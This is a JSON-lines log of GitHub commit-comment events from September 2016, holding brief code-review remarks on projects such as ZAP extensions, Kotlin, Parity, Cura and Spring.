{"id":"4533315248","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943098,"position":62,"line":62,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:07:05Z","updated_at":"2016-09-08T11:07:05Z","body":"Same"}},"created_at":"2016-09-08T11:07:05Z"}
{"id":"4533315305","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18943099,"position":17,"line":0,"path":"documentation/manual/working/scalaGuide/main/i18n/ScalaI18N.md","commit_id":"5621eeeb8938e3df3819d90b228c5042746f6db6","created_at":"2016-09-08T11:07:06Z","updated_at":"2016-09-08T11:07:06Z","body":"\"... method sets the cookie\"\n\n```\n`clearingLang` discards the cookie\n```"}},"created_at":"2016-09-08T11:07:06Z"}
{"id":"4533319507","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18943108,"position":19,"line":0,"path":"documentation/manual/working/scalaGuide/main/i18n/ScalaI18N.md","commit_id":"5621eeeb8938e3df3819d90b228c5042746f6db6","created_at":"2016-09-08T11:08:06Z","updated_at":"2016-09-08T11:08:06Z","body":"\"... parameter: [..].\""}},"created_at":"2016-09-08T11:08:06Z"}
{"id":"4533323630","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943114,"position":96,"line":96,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:09:07Z","updated_at":"2016-09-08T11:09:07Z","body":"0 concatenated with length?"}},"created_at":"2016-09-08T11:09:07Z"}
{"id":"4533323788","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18943115,"position":85,"line":114,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaStaticClassScope.kt","commit_id":"074293f38946e83d19010f3ce08186b119a6c4a4","created_at":"2016-09-08T11:09:08Z","updated_at":"2016-09-08T11:09:08Z","body":"Initially I was trying to avoid creating copy of the list in `mapNotNull`, but now I'm not sure if it's critical here"}},"created_at":"2016-09-08T11:09:08Z"}
{"id":"4533326473","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943123,"position":119,"line":119,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:09:48Z","updated_at":"2016-09-08T11:09:48Z","body":"Again"}},"created_at":"2016-09-08T11:09:48Z"}
{"id":"4533328941","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":18943124,"position":5,"line":28,"path":"Makefile","commit_id":"60ffb457ee2bc1b3c9a4b90a9f8c59847dc75850","created_at":"2016-09-08T11:10:24Z","updated_at":"2016-09-08T11:10:24Z","body":"不同的配置而已，https://github.com/lede-project/source/blob/master/package/network/utils/iproute2/Makefile#L141"}},"created_at":"2016-09-08T11:10:24Z"}
{"id":"4533330033","type":"CommitCommentEvent","actor":{"login":"jacogr"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18943125,"position":11,"line":10,"path":"js/src/dapps/registry/reducers.js","commit_id":"14e32517068fdf08bc97e8b138582e55c80b0096","created_at":"2016-09-08T11:10:37Z","updated_at":"2016-09-08T11:10:37Z","body":"Agreed. Just having a flat/unstructured list becomes unwieldy very quickly."}},"created_at":"2016-09-08T11:10:37Z"}
{"id":"4533330285","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943126,"position":124,"line":124,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:10:41Z","updated_at":"2016-09-08T11:10:41Z","body":"MismatchType is only used internally"}},"created_at":"2016-09-08T11:10:41Z"}
{"id":"4533334523","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943133,"position":144,"line":144,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:11:42Z","updated_at":"2016-09-08T11:11:42Z","body":"Again..assume the remainder need checking"}},"created_at":"2016-09-08T11:11:42Z"}
{"id":"4533334802","type":"CommitCommentEvent","actor":{"login":"jacogr"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18943134,"position":16,"line":20,"path":"js/src/dapps/registry/reducers.js","commit_id":"14e32517068fdf08bc97e8b138582e55c80b0096","created_at":"2016-09-08T11:11:46Z","updated_at":"2016-09-08T11:11:46Z","body":"Also not overly excited by it, but the array feels worse. Until we have a better sub-reducer idea, cannot see any other way."}},"created_at":"2016-09-08T11:11:46Z"}
{"id":"4533337470","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18943137,"position":65,"line":342,"path":"cura/BuildVolume.py","commit_id":"35168ddd5a7ce0cf2b974d3f377c58fac876a8bd","created_at":"2016-09-08T11:12:23Z","updated_at":"2016-09-08T11:12:23Z","body":"remove?"}},"created_at":"2016-09-08T11:12:23Z"}
{"id":"4533338969","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18943142,"position":12,"line":47,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaPackageScope.kt","commit_id":"430084e8419cd23adca32a2b8976ae054c2824d0","created_at":"2016-09-08T11:12:44Z","updated_at":"2016-09-08T11:12:44Z","body":"I haven't noticed that `fqName` is member in `LazyJavaPackageFragment`, thought it's extension calling `DescriptorUtils.getFqName`, I'll revert it"}},"created_at":"2016-09-08T11:12:44Z"}
{"id":"4533339818","type":"CommitCommentEvent","actor":{"login":"armab"},"repo":{"name":"StackStorm/chef-stackstorm"},"payload":{"comment":{"id":18943145,"position":null,"line":null,"path":null,"commit_id":"7b2efca05b99f9f35a76b2ad19df62de482d6c72","created_at":"2016-09-08T11:12:56Z","updated_at":"2016-09-08T11:12:56Z","body":" :+1: x :100: \r\nEspecially for changelog sync-up."}},"created_at":"2016-09-08T11:12:56Z"}
{"id":"4533340559","type":"CommitCommentEvent","actor":{"login":"Polcio"},"repo":{"name":"Polcio/it.unibs.progetti"},"payload":{"comment":{"id":18943147,"position":1,"line":1,"path":"GestoreMain.java","commit_id":"b18b02327fe2fd1406e9dfda1a4c2c8bf3a92ec2","created_at":"2016-09-08T11:13:08Z","updated_at":"2016-09-08T11:13:08Z","body":"/*\r\n * MyClass\r\n *\r\n * v1.0\r\n *\r\n * 2011-11-29\r\n * \r\n * This file is copyrighted in an awesome way.\r\n */"}},"created_at":"2016-09-08T11:13:08Z"}
{"id":"4533340589","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943148,"position":129,"line":129,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:13:08Z","updated_at":"2016-09-08T11:13:08Z","body":"This function name doesn't seem to match the code behaviour "}},"created_at":"2016-09-08T11:13:08Z"}
{"id":"4533340849","type":"CommitCommentEvent","actor":{"login":"ova2"},"repo":{"name":"ova2/bpmn-editor-poc"},"payload":{"comment":{"id":18943150,"position":3,"line":3,"path":"src/app/drawing/common/model/geometry/ICurve.ts","commit_id":"f249f86b206041578b47b6da6b694d6143366ab7","created_at":"2016-09-08T11:13:12Z","updated_at":"2016-09-08T11:13:12Z","body":"\"I\" ist nicht für Interfaces empfohlen. S. https://github.com/Microsoft/TypeScript/wiki/Coding-guidelines \"Do not use \"I\" as a prefix for interface names.\""}},"created_at":"2016-09-08T11:13:12Z"}
{"id":"4533341815","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18943152,"position":186,"line":569,"path":"src/main/java/edu/cornell/kfs/fp/service/impl/RecurringDisbursementVoucherDocumentServiceImpl.java","commit_id":"b366199f3fe9c44d4d7f9a331068879362aa3c40","created_at":"2016-09-08T11:13:26Z","updated_at":"2016-09-08T11:13:26Z","body":"is the save needed for the cancel date to persist?"}},"created_at":"2016-09-08T11:13:26Z"}
{"id":"4533343510","type":"CommitCommentEvent","actor":{"login":"miri64"},"repo":{"name":"kaspar030/RIOT"},"payload":{"comment":{"id":18943156,"position":9,"line":9,"path":"sys/include/event.h","commit_id":"bfa77830dbb25ff458f2c47f0a88470359a7e2ea","created_at":"2016-09-08T11:13:52Z","updated_at":"2016-09-08T11:13:52Z","body":"Why didn't you define this in `thread_flags.h`? This easily can lead to collisions in my opinion."}},"created_at":"2016-09-08T11:13:52Z"}
{"id":"4533345822","type":"CommitCommentEvent","actor":{"login":"jacogr"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18943161,"position":18,"line":18,"path":"js/src/dapps/registry/Lookup/lookup.js","commit_id":"7527bfa911918c6edf4acc6aac716e58c7e65d63","created_at":"2016-09-08T11:14:24Z","updated_at":"2016-09-08T11:14:24Z","body":"Historically (i.e. everywhere else), we have put the handlers as class methods so they don't get created each time the render(), method runs i.e.\r\n\r\n```\r\nrender () {\r\n  return <div onClick={ this.onClick }>click me</div>;\r\n}\r\n\r\nonClick = (event) => {\r\n  alert('hey, clicky');\r\n}\r\n```"}},"created_at":"2016-09-08T11:14:24Z"}
{"id":"4533352151","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943170,"position":196,"line":196,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:15:55Z","updated_at":"2016-09-08T11:15:55Z","body":"Are you going to include a fix for that? "}},"created_at":"2016-09-08T11:15:55Z"}
{"id":"4533354794","type":"CommitCommentEvent","actor":{"login":"jacogr"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18943178,"position":46,"line":46,"path":"js/src/dapps/registry/Lookup/lookup.js","commit_id":"7527bfa911918c6edf4acc6aac716e58c7e65d63","created_at":"2016-09-08T11:16:33Z","updated_at":"2016-09-08T11:16:33Z","body":"Management nightmare. I think you can probably do\r\n\r\n```\r\nrender () {\r\n  const { name, key, result } = this.props.lookup;\r\n  // use it here\r\n}\r\n```"}},"created_at":"2016-09-08T11:16:33Z"}
{"id":"4533356686","type":"CommitCommentEvent","actor":{"login":"snazzarov"},"repo":{"name":"snazzarov/lesson9"},"payload":{"comment":{"id":18943185,"position":11,"line":11,"path":"testaccessors.rb","commit_id":"a49493aadc56c3775eea61ae0d87bdf13f0ea3b3","created_at":"2016-09-08T11:17:02Z","updated_at":"2016-09-08T11:17:02Z","body":"понял"}},"created_at":"2016-09-08T11:17:02Z"}
{"id":"4533358092","type":"CommitCommentEvent","actor":{"login":"Turbo87"},"repo":{"name":"Harry-R/skylines"},"payload":{"comment":{"id":18943191,"position":null,"line":null,"path":null,"commit_id":"1555b05fae06cbca77e57ee2a463a3355c2c437a","created_at":"2016-09-08T11:17:22Z","updated_at":"2016-09-08T11:17:22Z","body":"note that this isn't doing any server-side checking for the JavaScript case yet. this means that if I change the pilot via API I could change it to a club member that doesn't have the permission set."}},"created_at":"2016-09-08T11:17:22Z"}
{"id":"4533363610","type":"CommitCommentEvent","actor":{"login":"jacogr"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18943199,"position":18,"line":18,"path":"js/src/dapps/registry/Lookup/lookup.js","commit_id":"7527bfa911918c6edf4acc6aac716e58c7e65d63","created_at":"2016-09-08T11:18:43Z","updated_at":"2016-09-08T11:18:43Z","body":"PS: because we use\r\n\r\n```\r\nonClick = (event) => {}\r\n```\r\n\r\nthe self is not needed. (Would only be in the case of\r\n\r\n```\r\nonClick (event) {}\r\n```"}},"created_at":"2016-09-08T11:18:43Z"}
{"id":"4533364221","type":"CommitCommentEvent","actor":{"login":"aneeshd16"},"repo":{"name":"jenkinsci/slack-plugin"},"payload":{"comment":{"id":18943201,"position":null,"line":null,"path":null,"commit_id":"e568a98e4fbe93937f12d9ff22dad282c7e3d374","created_at":"2016-09-08T11:18:51Z","updated_at":"2016-09-08T11:18:51Z","body":"Needed this change! When will this be released as an update?"}},"created_at":"2016-09-08T11:18:51Z"}
{"id":"4533367007","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"IntelOrca/OpenRCT2"},"payload":{"comment":{"id":18943205,"position":128,"line":337,"path":"src/rct1.h","commit_id":"193309025696cd7476768673f400b48f33ac3d33","created_at":"2016-09-08T11:19:32Z","updated_at":"2016-09-08T11:19:32Z","body":"This is just a copy and paste of rct_peep. Would be make these amendments for that first?"}},"created_at":"2016-09-08T11:19:32Z"}
{"id":"4533367915","type":"CommitCommentEvent","actor":{"login":"jhulslander"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18943207,"position":186,"line":569,"path":"src/main/java/edu/cornell/kfs/fp/service/impl/RecurringDisbursementVoucherDocumentServiceImpl.java","commit_id":"b366199f3fe9c44d4d7f9a331068879362aa3c40","created_at":"2016-09-08T11:19:46Z","updated_at":"2016-09-08T11:19:46Z","body":"Yes, and the order matters here"}},"created_at":"2016-09-08T11:19:46Z"}
{"id":"4533368146","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18943208,"position":45,"line":91,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/java/lazy/descriptors/LazyJavaPackageScope.kt","commit_id":"430084e8419cd23adca32a2b8976ae054c2824d0","created_at":"2016-09-08T11:19:49Z","updated_at":"2016-09-08T11:19:49Z","body":"It could happen in case of Java class, I'll move it closure to the case"}},"created_at":"2016-09-08T11:19:49Z"}
{"id":"4533369758","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943211,"position":243,"line":243,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:20:12Z","updated_at":"2016-09-08T11:20:12Z","body":"I'm sure this is a Dev note, but if there are conditions or circumstances the scanner misses the team would be glad to hear or see code contributed"}},"created_at":"2016-09-08T11:20:12Z"}
{"id":"4533370003","type":"CommitCommentEvent","actor":{"login":"spardathementor"},"repo":{"name":"Hellsing/ModAPI-Mods"},"payload":{"comment":{"id":18943214,"position":null,"line":null,"path":null,"commit_id":"3fae841fb9d8c58093f6c151e512f5dc01d4db1a","created_at":"2016-09-08T11:20:15Z","updated_at":"2016-09-08T11:20:15Z","body":"the god +1"}},"created_at":"2016-09-08T11:20:15Z"}
{"id":"4533370977","type":"CommitCommentEvent","actor":{"login":"graingert"},"repo":{"name":"pgilad/highcharts"},"payload":{"comment":{"id":18943220,"position":null,"line":null,"path":null,"commit_id":"7892264df962051fa457ad14ad0853ef72b09431","created_at":"2016-09-08T11:20:28Z","updated_at":"2016-09-08T11:20:28Z","body":"also that should be a monad:\r\n\r\n```js\r\nconst HighchartsExp = Highcharts.use(exporting);\r\nassert(HighchartsExp !== Highcharts)\r\n\r\nHighcharts.Chart({ ... }) // doesn't support exporting\r\nHighchartsExp.Chart({ ... }) // does support exporting\r\n```"}},"created_at":"2016-09-08T11:20:28Z"}
{"id":"4533373300","type":"CommitCommentEvent","actor":{"login":"Andygmb"},"repo":{"name":"Kurolox/DongerTyper"},"payload":{"comment":{"id":18943222,"position":15,"line":22,"path":"README.md","commit_id":"9fffce0b1f5c79509c98916e973f522ee7723966","created_at":"2016-09-08T11:21:00Z","updated_at":"2016-09-08T11:21:00Z","body":"Tomorrow has passed"}},"created_at":"2016-09-08T11:21:00Z"}
{"id":"4533373816","type":"CommitCommentEvent","actor":{"login":"JOTRainbow"},"repo":{"name":"JOTRainbow/ETrun"},"payload":{"comment":{"id":18943227,"position":null,"line":null,"path":null,"commit_id":"87de1a89e549d4e1abea7907ed6f4bf72c4761e0","created_at":"2016-09-08T11:21:07Z","updated_at":"2016-09-08T11:21:07Z","body":"https://github.com/ETrun/ETrun/commit/8c06036eb1dff1b0d7d472e0a7b69c694a20746b\r\n\r\nSometimes you don't want to use strictSave, you want to be able to save and load while your timerun runs.\r\nIn this case, you needed to \"/kill\" yourself to reset your time and you needed to \"/load\" again to jump to your previous position (so minimum 2 commands/binded buttons needed for that).\r\n\r\nNow you can use your \"/load\" and reset your time while a timerun is active."}},"created_at":"2016-09-08T11:21:07Z"}
{"id":"4533374412","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"nikomatsakis/rayon"},"payload":{"comment":{"id":18943228,"position":114,"line":114,"path":"src/par_iter/option.rs","commit_id":"fbc8b470a6e06d656428c6f79a11327439ffa59c","created_at":"2016-09-08T11:21:15Z","updated_at":"2016-09-08T11:21:15Z","body":"I think my point was that I might rather panic -- I don't know that it's legal to call this function if the reported len is <= 1. But I'd have to review the code to say for sure -- and thinking about it now, it seems like what you're doing makes sense. Doesn't seem *so* crazy to support splitting at the boundaries (0 or N)."}},"created_at":"2016-09-08T11:21:15Z"}
{"id":"4533377417","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18943233,"position":null,"line":null,"path":null,"commit_id":"a2ef5edfb75a82ad91f59b82cf19ccbbdb4045b0","created_at":"2016-09-08T11:21:58Z","updated_at":"2016-09-08T11:21:58Z","body":"Because I want values to be usable for both the STC test and LTC test, so I put the time control someway between them.\r\nBecause I have observed many 10+0.1 tuning sessions failing the LTC tests.\r\nSo I will take your suggestion and raise hash to 16."}},"created_at":"2016-09-08T11:21:58Z"}
{"id":"4533384190","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18943249,"position":15,"line":23,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-08T11:23:34Z","updated_at":"2016-09-08T11:23:34Z","body":"I'm not sure if anyone read my earlier email - I said quite specifically that we should have an audience in mind for the document, and the implementor as an audience is very important. That means either doing the description top down, or bottom up. "}},"created_at":"2016-09-08T11:23:34Z"}
{"id":"4533388802","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18943254,"position":83,"line":87,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-08T11:24:42Z","updated_at":"2016-09-08T11:24:42Z","body":"The whole idea of \"Bob is online\" doesn't really match most protocols. I'm not sure what it means in this case. I think we should avoid those kind of state-based definitions."}},"created_at":"2016-09-08T11:24:42Z"}
{"id":"4533388884","type":"CommitCommentEvent","actor":{"login":"jhulslander"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18943255,"position":104,"line":104,"path":"src/main/java/edu/cornell/kfs/fp/service/impl/RecurringDisbursementVoucherPaymentMaintenanceServiceImpl.java","commit_id":"b366199f3fe9c44d4d7f9a331068879362aa3c40","created_at":"2016-09-08T11:24:43Z","updated_at":"2016-09-08T11:24:43Z","body":"Extending PaymentMaintenanceServiceImpl created a problem with Spring, two classes were in Spring were associated with PaymentMaintenanceService, and that created problems in some base KFS code."}},"created_at":"2016-09-08T11:24:43Z"}
{"id":"4533389864","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18943291,"position":18,"line":18,"path":"js/src/dapps/registry/Lookup/lookup.js","commit_id":"7527bfa911918c6edf4acc6aac716e58c7e65d63","created_at":"2016-09-08T11:24:55Z","updated_at":"2016-09-08T11:24:55Z","body":"> PS: because we use […] the `self` is not needed.\r\n\r\nSo the method will be bound to the instance then?"}},"created_at":"2016-09-08T11:24:55Z"}
{"id":"4533390245","type":"CommitCommentEvent","actor":{"login":"JOTRainbow"},"repo":{"name":"JOTRainbow/ETrun"},"payload":{"comment":{"id":18943294,"position":null,"line":null,"path":null,"commit_id":"87de1a89e549d4e1abea7907ed6f4bf72c4761e0","created_at":"2016-09-08T11:25:01Z","updated_at":"2016-09-08T11:25:01Z","body":"pull request to master here: https://github.com/ETrun/ETrun/pull/68"}},"created_at":"2016-09-08T11:25:01Z"}
{"id":"4533392830","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18943296,"position":null,"line":null,"path":null,"commit_id":"78653d4e94740fe5e38be8f8cfaa6a6f20953664","created_at":"2016-09-08T11:25:38Z","updated_at":"2016-09-08T11:25:38Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32380/testReport/) for this commit**"}},"created_at":"2016-09-08T11:25:38Z"}
{"id":"4533395316","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18943304,"position":5,"line":3301,"path":"resources/definitions/fdmprinter.def.json","commit_id":"ee55e03911e1ef765b565317f5bfe964b5e7c90e","created_at":"2016-09-08T11:26:12Z","updated_at":"2016-09-08T11:26:12Z","body":"Technically, yeah. But half the size is already waaay to big. "}},"created_at":"2016-09-08T11:26:12Z"}
{"id":"4533395514","type":"CommitCommentEvent","actor":{"login":"MarcinKosinski"},"repo":{"name":"mi2-warsaw/FSelectorRcpp"},"payload":{"comment":{"id":18943305,"position":null,"line":null,"path":null,"commit_id":"12790e7c82289f743d20f7de78f1aa7a9fe09d71","created_at":"2016-09-08T11:26:15Z","updated_at":"2016-09-08T11:26:15Z","body":"@zzawadz WOW"}},"created_at":"2016-09-08T11:26:15Z"}
{"id":"4533395515","type":"CommitCommentEvent","actor":{"login":"aslakknutsen"},"repo":{"name":"nimishamukherjee/almighty-ui"},"payload":{"comment":{"id":18943306,"position":6,"line":18,"path":"src/app/work-item/work-item.service.ts","commit_id":"edd4b85d543092cf6b5741f368047a7518dc2a2e","created_at":"2016-09-08T11:26:15Z","updated_at":"2016-09-08T11:26:15Z","body":"This should only happen if you have a Token. Else you are constructing an invalid HTTP Header."}},"created_at":"2016-09-08T11:26:15Z"}
{"id":"4533398125","type":"CommitCommentEvent","actor":{"login":"macic"},"repo":{"name":"arskom/spyne"},"payload":{"comment":{"id":18943314,"position":null,"line":null,"path":null,"commit_id":"0e762659f61179899043ec924c7b5ab45aef4a13","created_at":"2016-09-08T11:26:53Z","updated_at":"2016-09-08T11:26:53Z","body":"thanks a lot, really."}},"created_at":"2016-09-08T11:26:53Z"}
{"id":"4533402377","type":"CommitCommentEvent","actor":{"login":"kaiwood"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18943324,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-08T11:27:56Z","updated_at":"2016-09-08T11:27:56Z","body":"Yes, as long as there is no open tab and the initial title \"Select Document\" is visible, it shows the custom shortcut. \r\n\r\nBut as soon as I have a file open and the menu title changes, it shows the default shortcut. I disabled my global shortcuts to test properly, the system ignores the custom one, the original one works. Looks like they are handled as completely separate items by the OS.\r\n\r\nI couldn't find any other application that changes a menu title in exact that way, if you have any suggestion I'd be happy to try it out.\r\n\r\n"}},"created_at":"2016-09-08T11:27:56Z"}
{"id":"4533402675","type":"CommitCommentEvent","actor":{"login":"fsateler"},"repo":{"name":"fsateler/mkosi"},"payload":{"comment":{"id":18943325,"position":6,"line":456,"path":"mkosi","commit_id":"3656ae181c052a5f0b22456d364ed9dc4c40854b","created_at":"2016-09-08T11:28:02Z","updated_at":"2016-09-08T11:28:02Z","body":"Ah, Ubuntu does not have usrmerge? Will consult with ubuntu people what's\ntheir plan.\n\nI prefer to leave a condition for older releases that can be dropped in the\nfuture when a new release is made (and thus the older release becomes\nuninteresting )\n\nOn 8 Sep 2016 6:03 a.m., \"Stefan\" <notifications@github.com> wrote:\n\n> @fsateler <https://github.com/fsateler> For Debian Jessie that works now\n> 👍\n>\n> But for Ubuntu none of them (vivid, wily and xenial or the latest yakkety)\n> provides usrmerge.\n>\n> So we probably should limit this to Debian and sid and stretch. So we can\n> use a kind of \"whitelist\" for that option, instead of a \"blacklist\". What\n> do you think?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/fsateler/mkosi/commit/3656ae181c052a5f0b22456d364ed9dc4c40854b#commitcomment-18941688>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABQsHSz_Rx-N0jxd-Doq_DtbSUyc_kRYks5qn89-gaJpZM4J3xFC>\n> .\n>\n"}},"created_at":"2016-09-08T11:28:02Z"}
{"id":"4533405157","type":"CommitCommentEvent","actor":{"login":"Fireflyever"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":18943330,"position":35,"line":90,"path":"spring-tx/src/main/java/org/springframework/transaction/config/AnnotationDrivenBeanDefinitionParser.java","commit_id":"4741a12fdc43782cc14692f58f3213edc18add7f","created_at":"2016-09-08T11:28:37Z","updated_at":"2016-09-08T11:28:37Z","body":"Hi Snicoll, \r\n\r\nCould I know why there is no protection for duplicate register TRANSACTIONAL_EVENT_LISTENER_FACTORY_BEAN_NAME under registerTransactionalEventListenerFactory?\r\n\r\nI can see like other method: registerTransactionAspect and configureAutoProxyCreator, there has protection for duplicate bean registration.\r\n\r\nMany Thanks!"}},"created_at":"2016-09-08T11:28:37Z"}
{"id":"4533408764","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18943335,"position":5,"line":177,"path":"repos/base-hw/src/core/include/pager.h","commit_id":"23afcfc42f3444b366c8813f28ed88779d91cef8","created_at":"2016-09-08T11:29:29Z","updated_at":"2016-09-08T11:29:29Z","body":"Agreed.\r\n"}},"created_at":"2016-09-08T11:29:29Z"}
{"id":"4533412183","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18943340,"position":null,"line":null,"path":null,"commit_id":"e689deb1a513eab5e02c8cd95883cb5c08a6c28c","created_at":"2016-09-08T11:30:18Z","updated_at":"2016-09-08T11:30:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cSxRj38rRrCE0jjlQnRTJQ"}},"created_at":"2016-09-08T11:30:18Z"}
{"id":"4533412519","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18943341,"position":null,"line":null,"path":null,"commit_id":"e689deb1a513eab5e02c8cd95883cb5c08a6c28c","created_at":"2016-09-08T11:30:22Z","updated_at":"2016-09-08T11:30:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#X2D4gro2TCCge-lnYNzOHA"}},"created_at":"2016-09-08T11:30:22Z"}
{"id":"4533419036","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18943348,"position":null,"line":null,"path":null,"commit_id":"ef63ff8846b09b6feee6b288e395a639bb5f871f","created_at":"2016-09-08T11:31:52Z","updated_at":"2016-09-08T11:31:52Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32382/testReport/) for this commit**"}},"created_at":"2016-09-08T11:31:52Z"}
{"id":"4533420784","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18943351,"position":null,"line":null,"path":null,"commit_id":"bf6c200770ed539493b41304ba86f0fe36ea73d1","created_at":"2016-09-08T11:32:17Z","updated_at":"2016-09-08T11:32:17Z","body":"I will work on the context menu this evening"}},"created_at":"2016-09-08T11:32:17Z"}
{"id":"4533421666","type":"CommitCommentEvent","actor":{"login":"jjskuld"},"repo":{"name":"Necrobot-Private/PokemonGo.RocketAPI"},"payload":{"comment":{"id":18943352,"position":null,"line":null,"path":null,"commit_id":"03e6e70a84334fc7f1dbe6ebf02d0a17cdbdcd3e","created_at":"2016-09-08T11:32:30Z","updated_at":"2016-09-08T11:32:30Z","body":"@NzV just curious why did you revert these changes?  These changes are necessary to fix rocket API client emulation."}},"created_at":"2016-09-08T11:32:30Z"}
{"id":"4533423025","type":"CommitCommentEvent","actor":{"login":"zzawadz"},"repo":{"name":"mi2-warsaw/FSelectorRcpp"},"payload":{"comment":{"id":18943355,"position":null,"line":null,"path":null,"commit_id":"12790e7c82289f743d20f7de78f1aa7a9fe09d71","created_at":"2016-09-08T11:32:50Z","updated_at":"2016-09-08T11:32:50Z","body":"There was a problem with 32bit java on appveyor, so I changed arch to x64:D"}},"created_at":"2016-09-08T11:32:50Z"}
